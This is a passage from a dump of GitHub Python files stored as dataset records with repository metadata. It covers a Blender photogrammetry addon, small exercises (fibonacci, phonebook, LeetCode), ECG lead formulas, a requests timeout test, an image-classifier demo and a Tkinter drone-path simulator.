4),\n (\"CUBIC\", \"CUBIC\", \"\", 5),\n (\"QUART\", \"QUART\", \"\", 6),\n (\"QUINT\", \"QUINT\", \"\", 7),\n (\"EXPO\", \"EXPO\", \"\", 8),\n (\"CIRC\", \"CIRC\", \"\", 9),\n (\"BACK\", \"BACK\", \"\", 10),\n (\"BOUNCE\", \"BOUNCE\", \"\", 11),\n (\"ELASTIC\", \"ELASTIC\", \"\", 12),\n (\"CONSTANT\", \"CONSTANT\", \"\", 13),\n ]\n interpolation_type: EnumProperty(\n name=\"Interpolation Type\",\n description=\"Blender string that defines the type of the interpolation\",\n items=interpolation_items,\n )\n\n consider_missing_cameras_during_animation: BoolProperty(\n name=\"Adjust Frame Numbers of Camera Animation\",\n description=\"Assume there are three consecutive images A,B and \"\n + \"C, but only A and C have been reconstructed. This option \"\n + \"adjusts the frame number of C and the number of interpolation \"\n + \"frames between camera A and C\",\n default=True,\n )\n\n remove_rotation_discontinuities: BoolProperty(\n name=\"Remove Rotation Discontinuities\",\n description=\"The addon uses quaternions q to represent the \"\n + \"rotation. A quaternion q and its negative -q describe the same \"\n + \"rotation. This option allows to remove different signs\",\n default=True,\n )\n\n suppress_distortion_warnings: BoolProperty(\n name=\"Suppress Distortion Warnings\",\n description=\"Radial distortion might lead to incorrect alignments \"\n + \"of cameras and points. Enable this option to suppress \"\n + \"corresponding warnings. If possible, consider to re-compute the \"\n + \"reconstruction using a camera model without radial distortion\",\n default=False,\n )\n\n adjust_render_settings: BoolProperty(\n name=\"Adjust Render Settings\",\n description=\"Adjust the render settings according to the \"\n + \"corresponding images - all images have to be captured with the \"\n + \"same device. 
If disabled the visualization of the camera cone \"\n + \"in 3D view might be incorrect\",\n default=True,\n )\n\n camera_extent: FloatProperty(\n name=\"Initial Camera Extent (in Blender Units)\",\n description=\"Initial Camera Extent (Visualization)\",\n default=1,\n )\n\n def draw_camera_options(\n self,\n layout,\n draw_image_fp=True,\n draw_depth_map_import=False,\n draw_image_size=False,\n draw_principal_point=False,\n draw_focal_length=False,\n draw_everything=False,\n ):\n camera_box = layout.box()\n\n if draw_image_fp or draw_everything:\n camera_box.prop(self, \"image_fp_type\")\n if self.image_fp_type in [\"NAME\", \"RELATIVE\"] or draw_everything:\n camera_box.prop(self, \"image_dp\")\n\n if (\n draw_focal_length\n or draw_image_size\n or draw_principal_point\n or draw_everything\n ):\n image_box = camera_box.box()\n if draw_focal_length or draw_everything:\n image_box.prop(self, \"default_focal_length\")\n if draw_image_size or draw_everything:\n image_box.prop(self, \"default_width\")\n image_box.prop(self, \"default_height\")\n if draw_principal_point or draw_everything:\n image_box.prop(self, \"default_pp_x\")\n image_box.prop(self, \"default_pp_y\")\n\n import_camera_box = camera_box.box()\n import_camera_box.prop(self, \"import_cameras\")\n if self.import_cameras or draw_everything:\n import_camera_box.prop(self, \"camera_extent\")\n import_camera_box.prop(self, \"add_background_images\")\n\n image_plane_box = import_camera_box.box()\n image_plane_box.prop(self, \"add_image_planes\")\n if self.add_image_planes or draw_everything:\n image_plane_box.prop(self, \"add_image_plane_emission\")\n image_plane_box.prop(self, \"image_plane_transparency\")\n\n if draw_depth_map_import or draw_everything:\n depth_map_box = import_camera_box.box()\n depth_map_box.prop(self, \"add_depth_maps_as_point_cloud\")\n if self.add_depth_maps_as_point_cloud or draw_everything:\n depth_map_box.prop(self, \"use_default_depth_map_color\")\n if self.use_default_depth_map_color or draw_everything:\n depth_map_box.prop(self, \"depth_map_default_color\")\n depth_map_box.prop(self, \"depth_map_display_sparsity\")\n depth_map_box.prop(self, \"depth_map_id_or_name_str\")\n\n anim_box = camera_box.box()\n anim_box.prop(self, \"add_camera_motion_as_animation\")\n\n if self.add_camera_motion_as_animation or draw_everything:\n anim_box.row().prop(self, \"animation_frame_source\", expand=True)\n if self.animation_frame_source == \"ORIGINAL\" or draw_everything:\n anim_box.prop(self, \"add_animated_camera_background_images\")\n if self.animation_frame_source == \"ADJUSTED\" or draw_everything:\n anim_box.prop(self, \"number_interpolation_frames\")\n anim_box.prop(self, \"consider_missing_cameras_during_animation\")\n anim_box.prop(self, \"interpolation_type\")\n anim_box.prop(self, \"remove_rotation_discontinuities\")\n\n camera_box.prop(self, \"suppress_distortion_warnings\")\n camera_box.prop(self, \"adjust_render_settings\")\n\n def enhance_camera_with_intrinsics(self, cameras):\n # This function should be overwritten,\n # if the intrinsic parameters are not part of the reconstruction data\n # (e.g. log file)\n success = True\n return cameras, success\n\n def enhance_camera_with_images(self, cameras):\n # This function should be overwritten,\n # if image size is not part of the reconstruction data\n # (e.g. 
nvm file)\n        success = True\n        return cameras, success\n\n    def import_photogrammetry_cameras(self, cameras, parent_collection):\n        if self.import_cameras or self.add_camera_motion_as_animation:\n            cameras, success = self.enhance_camera_with_images(cameras)\n            if success:\n                cameras, success = self.enhance_camera_with_intrinsics(cameras)\n            if success:\n                # The principal point information may be provided in the reconstruction data\n                if not principal_points_initialized(cameras):\n                    set_principal_point_for_cameras(\n                        cameras, self.default_pp_x, self.default_pp_y, self\n                    )\n\n                if self.adjust_render_settings:\n                    adjust_render_settings_if_possible(cameras, op=self)\n\n                if self.import_cameras:\n                    add_cameras(\n                        cameras,\n                        parent_collection,\n                        image_dp=self.image_dp,\n                        add_background_images=self.add_background_images,\n                        add_image_planes=self.add_image_planes,\n                        add_depth_maps_as_point_cloud=self.add_depth_maps_as_point_cloud,\n                        camera_scale=self.camera_extent,\n                        image_plane_transparency=self.image_plane_transparency,\n                        add_image_plane_emission=self.add_image_plane_emission,\n                        use_default_depth_map_color=self.use_default_depth_map_color,\n                        depth_map_default_color=self.depth_map_default_color,\n                        depth_map_display_sparsity=self.depth_map_display_sparsity,\n                        depth_map_id_or_name_str=self.depth_map_id_or_name_str,\n                        op=self,\n                    )\n\n                if self.add_camera_motion_as_animation:\n                    add_camera_animation(\n                        cameras,\n                        parent_collection,\n                        self.animation_frame_source,\n                        self.add_animated_camera_background_images,\n                        self.number_interpolation_frames,\n                        self.interpolation_type,\n                        self.consider_missing_cameras_during_animation,\n                        self.remove_rotation_discontinuities,\n                        self.image_dp,\n                        self.image_fp_type,\n                        op=self,\n                    )\n            else:\n                return {\"FINISHED\"}\n","repo_name":"rgurve/Blender-Addon-Photogrammetry-Importer","sub_path":"photogrammetry_importer/properties/camera_import_properties.py","file_name":"camera_import_properties.py","file_ext":"py","file_size_in_byte":15199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"}
{"seq_id":"10310459553","text":"import requests\nimport json\n\nheaders = {\n    \"Content-Type\": \"application/json\"\n}\npayload = {\n    \"test\": 1,\n    \"active\": True,\n}\n\ntext = requests.post('http://requestbin.fullcontact.com/186d34m1', data=json.dumps(payload), headers=headers, timeout=(2, 10))\nprint(text)","repo_name":"pfortin-urbn/misc-py2","sub_path":"requests-timeout.py","file_name":"requests-timeout.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"25088816521","text":"import fcntl\n\n\ndef write_base(name, phone_num):\n    with open('PhoneBook.txt', 'at') as base:\n        fcntl.lockf(base, fcntl.LOCK_EX)\n        base.write(f'{name}:{phone_num}')\n        fcntl.lockf(base, fcntl.LOCK_UN)\n\n\n################################################################\n\nclass CSV:\n    def load(self):\n        print('CSV load')\n        return {'Bill': '911'}\n\n    def save(self, d):\n        print('CSV save')\n\n\nclass JSON:\n    def load(self):\n        print('Json load')\n        return {'Bill': '911'}\n\n    def save(self, d):\n        print('JSON save')\n\n\nCONFIG = {\n    'dumper': 'CSV'\n}\n\nif CONFIG['dumper'] == 'CSV':\n    dumper = CSV()\nelif CONFIG['dumper'] == 'JSON':\n    dumper = JSON()\n\nphonebook = dumper.load()\n\n# MODEL 
CODE\n\ndumper.save(phonebook)\n","repo_name":"SerialSata/ITEA-PythonAdvanced","sub_path":"ClassProject/ClassProject.py","file_name":"ClassProject.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"16740689286","text":"\n# %%\nprint('Hello World!')\n\n\n# %%\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nt = np.linspace(0, 10, 100)\ny = np.sin(t)\n\nplt.figure()\nplt.plot(t, y)\nplt.show()\n","repo_name":"airnh-courses/welcomelab","sub_path":"helloworld.py","file_name":"helloworld.py","file_ext":"py","file_size_in_byte":169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"28795168459","text":"\ndef parse(inputs_file, groupping_symbol=\"group\", input_parts=[\"name\", \"path\"]):\n    \"\"\"Parses a yayaml file and returns dict of inputs.\"\"\"\n\n    inputs_lines = [line.strip() for line in open(inputs_file, \"r\").readlines()]\n    inputs_lines = [line for line in inputs_lines if line and not line.startswith(\"#\")]\n    cur_group = None\n    i = 0\n    group_prefix = \"%s:\" % groupping_symbol\n    input_prefixes = [\"%s:\" % input_part for input_part in input_parts]\n\n    groups = {}\n    while i < len(inputs_lines):\n        line = inputs_lines[i]\n        if line.startswith(group_prefix):\n            # Start new group\n            cur_group = line[len(group_prefix):]\n            i += 1\n        elif line.startswith(input_prefixes[0]):\n            input = []\n            for j, input_prefix in enumerate(input_prefixes):\n                part_line = inputs_lines[i + j]\n                part = part_line[len(input_prefixes[j]):]\n                input.append(part)\n            if cur_group not in groups:\n                groups[cur_group] = []\n            groups[cur_group].append(input)\n            i += len(input_prefixes)\n        else:\n            # Skip empty line\n            i += 1\n    return groups\n","repo_name":"jmchilton/pyyayaml","sub_path":"pyyayaml/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"28814165180","text":"#!/usr/bin/env python3\n# encoding: utf-8\n# utils.py create by zander on 2017/8/16 14:03\nimport uuid\nimport _md5\nimport os\n\n\ndef handle_file_upload(file):\n    \"\"\"\n    保存上传文件到服务器\n    :param file: 上传文件\n    :return: f_name\n    \"\"\"\n    base_dir = os.path.dirname(os.path.abspath(__file__))\n    pic_dir = os.path.join(base_dir, \"static\", \"upload\")\n    uid = \"\".join(str(uuid.uuid4()).split(\"-\")[:2])\n\n    f_name = \".\".join([uid,file.name.split(\".\")[1]])\n    f_path = os.path.join(pic_dir, f_name)\n    with open(f_path, \"wb+\") as pic:\n        for chunk in file.chunks():\n            pic.write(chunk)\n    return f_name\n","repo_name":"nbeezander/djsite","sub_path":"mining/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
{"seq_id":"30717673736","text":"# Среди натуральных чисел, которые были введены, найти наибольшее по сумме цифр. 
Вывести на экран это число и сумму\n# его цифр.\n\n\ndef sum_digit(a):\n    result = 0\n    if a.isdigit():\n        for i in a:\n            result += int(i)\n    return result\n\n\nif __name__ == '__main__':\n    num = 1\n    max_sum = 0\n    num_max = 0\n    while num != '0':\n        num = input('Введите натуральное число или ноль для завершения программы:')\n        s = sum_digit(num)\n        if s >= max_sum:\n            max_sum = s\n            num_max = num\n    if max_sum != 0:\n        print(f'Максимальная сумма цифр {max_sum} в числе {num_max}')\n    else:\n        print('Не введено ни одного натурального числа')\n","repo_name":"RSV48/algorithms","sub_path":"task_02_09.py","file_name":"task_02_09.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"30328156355","text":"def fibonacci(n):\n    \"\"\"\n\tReturns the nth number in the Fibonacci sequence\n    \"\"\"\n    if n < 0:\n        raise ValueError(\"n < 0 not valid\")\n    elif round(n) != n:\n        raise ValueError(\"fractional n not allowed\")\n    elif n < 2:\n        return n\n    else:\n        return fibonacci(n-1) + fibonacci(n-2)\n    \n    \n    \n","repo_name":"Kselvon/ContiniousIntegration","sub_path":"fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"1429037194","text":"\"\"\"\r\nRxBox: Lead Calculator Module\r\nContains methods that computes for lead I and the three augmented leads\r\n\r\nAuthors: Dan Simone M. Cornillez\r\n         ------------------------------------------------\r\n         Instrumentation, Robotics and Control Laboratory\r\n         University of the Philippines - Diliman\r\n         ------------------------------------------------\r\n         July 2009\r\n\"\"\"\r\n\r\ndef LI(leadII,leadIII):\r\n    \"\"\" function that computes for lead I\r\n\r\n    Computes the lead I using the following equation:\r\n\r\n    leadI = leadII - leadIII\r\n    \r\n    Parameters\r\n    ----------\r\n    leadII : list of lead II values\r\n    leadIII : list of lead III values\r\n\r\n    Returns\r\n    -------\r\n    leadI : list of lead I values\r\n    \"\"\"\r\n\r\n    leadI=[]\r\n    for i in range(len(leadII)):\r\n        \r\n        leadI.append((-leadIII[i])+leadII[i])\r\n    return leadI\r\n\r\n\r\ndef LVL(leadII,leadIII):\r\n    \"\"\" function that computes for augmented lead VL\r\n\r\n    Computes the lead aVL using the following equation:\r\n\r\n    leadaVL = 0.5*leadII - leadIII\r\n    \r\n    Parameters\r\n    ----------\r\n    leadII : list of lead II values\r\n    leadIII : list of lead III values\r\n\r\n    Returns\r\n    -------\r\n    leadaVL : list of lead aVL values\r\n    \"\"\"\r\n\r\n    leadaVL = []\r\n    for i in range(len(leadII)):\r\n        leadaVL.append((-leadIII[i])+(0.5*leadII[i]))\r\n    return leadaVL  \r\n\r\ndef LVF(leadII,leadIII):\r\n    \"\"\" function that computes for augmented lead VF\r\n\r\n    Computes the lead aVF using the following equation:\r\n\r\n    leadaVF = 0.5*(leadII + leadIII)\r\n    \r\n    Parameters\r\n    ----------\r\n    leadII : list of lead II values\r\n    leadIII : list of lead III values\r\n\r\n    Returns\r\n    -------\r\n    leadaVF : list of lead aVF values\r\n    \"\"\"\r\n\r\n    leadaVF = []\r\n    for i in range(len(leadII)):\r\n        leadaVF.append(0.5*(leadIII[i]+leadII[i]))\r\n\r\n    return leadaVF\r\n\r\ndef LVR(leadII,leadIII):\r\n    \"\"\" function that computes for augmented lead VR\r\n\r\n    Computes the lead aVR using the following equation:\r\n\r\n    leadaVR = 0.5*(leadIII - leadII)\r\n    \r\n    Parameters\r\n    ----------\r\n    leadII : list of lead II values\r\n    leadIII : list of lead III values\r\n\r\n    Returns\r\n    -------\r\n    leadaVR : list of lead aVR values\r\n 
\"\"\"\r\n\r\n leadaVR = []\r\n for i in range(len(leadII)):\r\n leadaVR.append(0.5*(leadIII[i]-leadII[i]))\r\n\r\n return leadaVR\r\n\r\n\r\n","repo_name":"hamalawy/telehealth","sub_path":"lifelink/rxbox/branches/RxBox v0.2/leadcalc.py","file_name":"leadcalc.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"72565788354","text":"'''\n\nDescription:\n\nGiven two strings: s1 and s2 with the same size, check if some permutation of string s1 can break some permutation of string s2 or vice-versa (in other words s2 can break s1).\n\nA string x can break string y (both of size n) if x[i] >= y[i] (in alphabetical order) for all i between 0 and n-1.\n\n \n\nExample 1:\n\nInput: s1 = \"abc\", s2 = \"xya\"\nOutput: true\nExplanation: \"ayx\" is a permutation of s2=\"xya\" which can break to string \"abc\" which is a permutation of s1=\"abc\".\n\n\n\nExample 2:\n\nInput: s1 = \"abe\", s2 = \"acd\"\nOutput: false \nExplanation: All permutations for s1=\"abe\" are: \"abe\", \"aeb\", \"bae\", \"bea\", \"eab\" and \"eba\" and all permutation for s2=\"acd\" are: \"acd\", \"adc\", \"cad\", \"cda\", \"dac\" and \"dca\". However, there is not any permutation from s1 which can break some permutation from s2 and vice-versa.\n\n\n\nExample 3:\n\nInput: s1 = \"leetcodee\", s2 = \"interview\"\nOutput: true\n \n\nConstraints:\n\ns1.length == n\ns2.length == n\n1 <= n <= 10^5\nAll strings consist of lowercase English letters.\n\n'''\n\n\n\nfrom string import ascii_lowercase\nfrom collections import Counter \n \nclass Solution:\n def checkIfCanBreak(self, s1: str, s2: str) -> bool:\n\n \n def break_another( dict_s1, dict_s2 ):\n \n s1_score, s2_score = 0, 0\n \n s1_win, s2_win = True, True\n \n for letter in reversed(ascii_lowercase):\n \n # scan from 'z' to 'a', (from strong letter to weak letter)\n \n s1_score += dict_s1[letter]\n s2_score += dict_s2[letter]\n \n # s1 break s2 if s1's score is larger than or equal to s2's score always, and vice versa.\n s1_win &= ( s1_score >= s2_score )\n s2_win &= ( s2_score >= s1_score )\n \n \n return s1_win or s2_win\n \n # --------------------------------------------\n \n ## dictionary\n # key: lowercase alphabet letter\n # value: occurrence\n dict_s1, dict_s2 = map( Counter, [s1, s2] )\n \n return break_another(dict_s1, dict_s2)\n\n\n\n# n : the character length of string\n\n## Time Complexity: O( n )\n#\n# The overhead in time is the cost of dictionary building, which is of O( n )\n\n## Space Complexity: O( n )\n#\n# The overhead in spaceis the storage for dictionary, which is of O( n )\n\nfrom collections import namedtuple\nTestEntry = namedtuple('TestEntry', 's1 s2')\n\ndef test_bench():\n\n test_data = [\n TestEntry(s1 = \"abc\", s2 = \"xya\" ),\n TestEntry(s1 = \"abe\", s2 = \"acd\" ),\n TestEntry(s1 = \"leetcodee\", s2 = \"interview\" ),\n ]\n\n for t in test_data:\n\n print( Solution().checkIfCanBreak( *t ) )\n \n return\n\n\n\nif __name__ == '__main__':\n\n test_bench() ","repo_name":"brianchiang-tw/leetcode","sub_path":"No_1433_Check If a String Can Break Another String/by_letter_score_and_dictionary.py","file_name":"by_letter_score_and_dictionary.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"} +{"seq_id":"10969219096","text":"import unittest\nimport numpy as np\n\n# from Differential_Evolution2 import StoppingCriterion\nimport 
sys\nsys.path.append(r'C:\Users\bonnyaigergo\Documents\GitHub\Evolutionary-Algorithms\Differential_Evolution2')\nimport StoppingCriterion\n\nclass TestImpBestObj(unittest.TestCase):\n    \n    def setUp(self):\n        self.termination = StoppingCriterion.ImpBestObj()\n    \n    def test_ImpBestObj_case1(self):\n        \"\"\"\n        Testing outcomes by simulated iterations\n\n        Returns\n        -------\n        True, True\n        \"\"\"\n        self.termination.from_nth_gen = 0\n        self.termination.patience = 3\n        fitnesses = np.array([[0, 2, 1],\n                              [0, 1, 1],\n                              [0, 0, 1],\n                              [0, 0, 1]])\n        best_idx = 0\n        outcome = []\n        \n        for i in range(len(fitnesses)): \n            fitness = fitnesses[i]\n            nth_gen = i\n            outcome.append(self.termination.MeetCriterion(fitness, best_idx, nth_gen))\n        \n        self.assertEqual(self.termination.metric_list.tolist(), [0, 0, 0, 0])\n        self.assertEqual(outcome, [False, False, True, True])\n    \nif __name__ == '__main__':\n    unittest.main()\n    # Pycharm\n    # import coverage\n    # coverage run Differential_Evolution2\unit_test\testing_StoppingCriterion\unit_test_MaxDistObj.py\n    # coverage run -m unittest Differential_Evolution2\unit_test\testing_StoppingCriterion\unit_test_MaxDistObj.py\n    # coverage report\n    # coverage report -m\n    # coverage html\n    # index.html file\n    \n    # pip install pytest-cov\n","repo_name":"GergoGit/Evolutionary-Algorithms","sub_path":"Metaheuristics2/unit_test/testing_StoppingCriterion/unit_test_ImpBestObj.py","file_name":"unit_test_ImpBestObj.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"37856605558","text":"\"\"\"\nJust a quick program that takes the hit_page.html and surrounds it by html\nthat lets you view it directly in a browser\n\"\"\"\n\ndef main():\n    with open(\"mturk_hit_page.html\", 'r', encoding='utf-8') as f:\n        raw_html = f.read()\n    new_html = \"<html><head><title>HIT Preview</title></head><body>\" + raw_html\n    new_html = new_html + \"</body></html>\"\n    output_fpath = \"mturk_hit_preview.html\"\n    with open(output_fpath, 'w', encoding='utf-8') as g:\n        g.write(new_html)\n    print(f\"Preview html written to {output_fpath}\")\n\nif __name__ == \"__main__\":\n    main()","repo_name":"jpowerj/mturk-twostage","sub_path":"code/gen_hit_preview.py","file_name":"gen_hit_preview.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"6598194932","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport tensorflow_datasets as tfds\nimport tensorflow as tf\nimport numpy as np\nfrom PIL import Image\nfrom ipywidgets import widgets\nimport io\n\n\n# In[2]:\n\n\nidx2label = {\n    0: \"tench\", \n    1: \"English springer\", \n    2: \"cassette player\", \n    3: \"chain saw\", \n    4: \"church\", \n    5: \"French horn\", \n    6: \"garbage truck\",\n    7: \"gas pump\", \n    8: \"golf ball\", \n    9: \"parachute\"\n}\n\n\n# In[3]:\n\n\ndef classify(image, model):\n    image = tf.convert_to_tensor(np.array(image)).numpy()\n    image = tf.image.resize(image, (160, 160))\n    batch = tf.expand_dims(image, 0)\n    res = model(batch)\n    conf_idx = tf.argmax(tf.sigmoid(res[0]))\n    print(f\"It's a: {idx2label[tf.argmax(res[0]).numpy()]} with a confidence of {tf.sigmoid(res[0])[conf_idx] * 100:.3f}%\")\n\n\n# In[4]:\n\n\nfrom ipywidgets import FileUpload\nupload = FileUpload()\nupload\n\n\n# In[5]:\n\n\nmodel = tf.keras.models.load_model(\"best.hdf5\")\n\n\n# In[6]:\n\n\nbutton = widgets.Button(description='Classify!')\nout = widgets.Output()\n\ndef on_button_clicked(_):\n    with out:\n        with 
tf.device('/CPU:0'):\n data = upload.data\n image = Image.open(io.BytesIO(data[-1]))\n classify(image, model)\n \nbutton.on_click(on_button_clicked)\nwidgets.VBox([button,out])\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Abhiswain97/Tensorflow-projects","sub_path":"Imagenette_classification/Deploy_with_voila.py","file_name":"Deploy_with_voila.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39987300761","text":"from asyncio import constants\r\nfrom atexit import register\r\nfrom cProfile import label\r\nfrom cmath import sqrt, tan\r\nfrom contextlib import nullcontext\r\nfrom xmlrpc.client import boolean\r\nimport numpy as np\r\nfrom numpy import ones,vstack\r\nfrom numpy.linalg import lstsq\r\nfrom shapely.geometry import LineString\r\nimport operator\r\nfrom datetime import datetime\r\nimport tkinter as tk\r\nfrom PIL import ImageTk, Image \r\nimport math\r\n\r\nRANGE_LIMIT = 10\r\n\r\n#(m,c)\r\n\r\n\r\nclass Drone():\r\n id = 0\r\n equation = [(0,4)] #m,c\r\n src = (0.0,0.0)\r\n dst = []\r\n lauched_time = 0.0\r\n last_known_position = (-2.0,4.0)\r\n last_known_speed = 0.0\r\n speed = []\r\n\r\n def __init__(self,id,src,dst) -> None:\r\n self.id = id\r\n self.src = src\r\n self.dst = dst\r\n \r\n #fly x distance in delta time\r\n #speed (vx,vy)\r\n def fly(self,speed,delta):\r\n #update last known position\r\n self.last_known_position = tuple(map(operator.add,self.last_known_position, speed*delta))\r\n self.last_known_speed = speed\r\n\r\nactive_drones = [Drone(0,(-2.0,4.0),[(3.0,4.0)])]\r\n\r\n\r\n\r\n\r\nclass Example(tk.Frame):\r\n cur_pos = 0\r\n src_entry = 0\r\n label_pointer = 0\r\n last_clicked = 0\r\n src = []\r\n registered = []\r\n drone_position = []\r\n drone_label = []\r\n last_speed = []\r\n root = 0\r\n id = 0\r\n new_speed = 0.0\r\n def __init__(self, parent):\r\n tk.Frame.__init__(self, parent)\r\n self.root = parent\r\n image1 = Image.open(\"./Interview drone.png\")\r\n image1 = image1.resize((1000, 500), Image.ANTIALIAS)\r\n test = ImageTk.PhotoImage(image1)\r\n \r\n label1 = tk.Label(image=test)\r\n label1.image = test\r\n # Position image\r\n label1.place(x=0, y=0)\r\n label1.bind(\"\", self.callback)\r\n self.label_pointer = label1\r\n entry1 = tk.Entry (name = \"src\") \r\n entry1.place( x= 500, y=550)\r\n self.src_entry = entry1\r\n\r\n button1 = tk.Button(text=\"Submit\",command = self.submit)\r\n button1.place(x=450, y=550)\r\n button2 = tk.Button(text=\"Run\",command = self.run)\r\n button2.place(x=400, y=550)\r\n\r\n def submit(self):\r\n self.last_clicked = 0\r\n if len(self.registered) == self.id:\r\n self.registered.insert(self.id,[self.cur_pos])\r\n else :\r\n self.registered[self.id].append(self.cur_pos)\r\n print(self.registered)\r\n \r\n\r\n def run(self):\r\n self.new_speed = self.calculate_path((self.registered[self.id][0],self.registered[self.id][1]))\r\n if self.calculate_path((self.registered[self.id][0],self.registered[self.id][1])) != 0.01:\r\n print(\"new speed is :\" + str(self.new_speed))\r\n print(\"new speed is \", self.new_speed)\r\n image2 = Image.open(\"./drone.png\")\r\n image2 = image2.resize((10, 10), Image.ANTIALIAS)\r\n test = ImageTk.PhotoImage(image2)\r\n label1 = tk.Label(image=test)\r\n label1.image = test\r\n # Position image\r\n self.drone_label.append(label1)\r\n label1.place(x=self.registered[self.id][0][0], y=self.registered[self.id][0][1])\r\n self.drone_position.append(self.registered[self.id][0])\r\n 
self.src.append(self.drone_position[self.id])\r\n _ = self.registered[self.id].pop(0)\r\n self.fly(self.new_speed,self.registered[self.id][0],self.id)\r\n self.id += 1\r\n #self.last_speed.append(new_speed)\r\n #self.src[self.id],self.new_speed,self.registered[self.id][0],self.id\r\n \r\n def fly(self,speed, dst,id):\r\n speed = 0.01\r\n delta = 100\r\n \r\n if(abs(self.drone_position[id][0]-self.registered[id][0][0])<0.5 and abs(self.drone_position[id][1]-self.registered[id][0][1]) <0.5):\r\n if len(self.registered[id]) > 1:\r\n self.registered[id].pop(0)\r\n self.src[id] = self.drone_position[id]\r\n self.after(delta, self.fly,self.src[id],self.registered[id][0],id)\r\n \r\n print(self.drone_position[id])\r\n return\r\n else:\r\n return\r\n\r\n direction_x = 1\r\n direction_y = 1\r\n m = abs((dst[1] - self.drone_position[id][1])/(dst[0]-self.drone_position[id][0]))\r\n vx = math.sqrt(abs(speed**2/(1+m)))\r\n vy = math.sqrt(speed**2 - vx**2)\r\n #print(vx,vy)\r\n if (dst[0] < self.drone_position[id][0]):\r\n direction_x = -1\r\n if (dst[1] < self.drone_position[id][1]):\r\n direction_y = -1\r\n self.drone_label[id].place(x = self.drone_position[id][0]+vx*delta*direction_x, y = self.drone_position[id][1]+vy*delta*direction_y)\r\n temp =(self.drone_position[id][0] + vx*delta*direction_x, self.drone_position[id][1] + vy*delta*direction_y)\r\n self.drone_position[id] = temp\r\n self.after(delta, self.fly,self.src[id],dst,id)\r\n\r\n def callback(self,event):\r\n if self.last_clicked != 0 :\r\n self.cur_pos = 0\r\n self.last_clicked.destroy()\r\n print(\"clicked at\", event.x, event.y)\r\n self.src_entry.delete(0,tk.END)\r\n self.src_entry.insert(0,str(event.x))\r\n self.cur_pos = (event.x,event.y)\r\n image2 = Image.open(\"./circle.png\")\r\n image2 = image2.resize((10, 10), Image.ANTIALIAS)\r\n test = ImageTk.PhotoImage(image2)\r\n label1 = tk.Label(image=test)\r\n label1.image = test\r\n # Position image\r\n label1.place(x=event.x, y=event.y)\r\n self.last_clicked = label1\r\n\r\n def calculate_path (self,points) -> float:\r\n # if abs(dst-src) > RANGE_LIMIT:\r\n # pass\r\n\r\n #get linear equation\r\n x_coords, y_coords = zip(*points)\r\n A = vstack([x_coords,ones(len(x_coords))]).T\r\n m, c = lstsq(A, y_coords)[0]\r\n print(\"Line Solution is y = {m}x + {c}\".format(m=m,c=c))\r\n\r\n #iterate through the list of active drones\r\n for id in range(self.id):\r\n for i in range(len(self.registered[id])):\r\n #src,dst\r\n line = LineString([points[0],points[1]])\r\n other = LineString([self.drone_position[id],self.registered[id][i]])\r\n\r\n #check if the line section intersect\r\n if(line.intersects(other)) :\r\n #if intersect, find the collision point\r\n M = ((self.registered[id][i][1] - self.src[id][0])/abs(self.registered[id][i][1]-self.src[id][0]))\r\n C = self.src[id][1]-self.src[id][0]*M\r\n a = np.asarray([(M,1), (m,1)])\r\n b = np.asarray((C,c))\r\n ans = np.linalg.solve(a,b)\r\n time_left_old = math.hypot(ans[0]-self.drone_position[id][0],ans[1]-self.drone_position[id][1])/0.01\r\n time_left_new = math.hypot(ans[0]-points[0][0],ans[1]-points[0][1])/0.01\r\n if(abs(time_left_new-time_left_old) < 100000):\r\n return float(math.hypot(ans[0]-points[0][0],ans[1]-points[0][1])/100000.0)\r\n \r\n else :\r\n break\r\n return 0.01\r\n\r\ndef test():\r\n #src,dst\r\n now = datetime.now()\r\n current_time = now \r\n print(\"Current Time =\", current_time)\r\n\r\ntest()\r\nroot = tk.Tk()\r\nroot.geometry(\"1000x600\")\r\n\r\nExample(root).pack(fill=\"both\", 
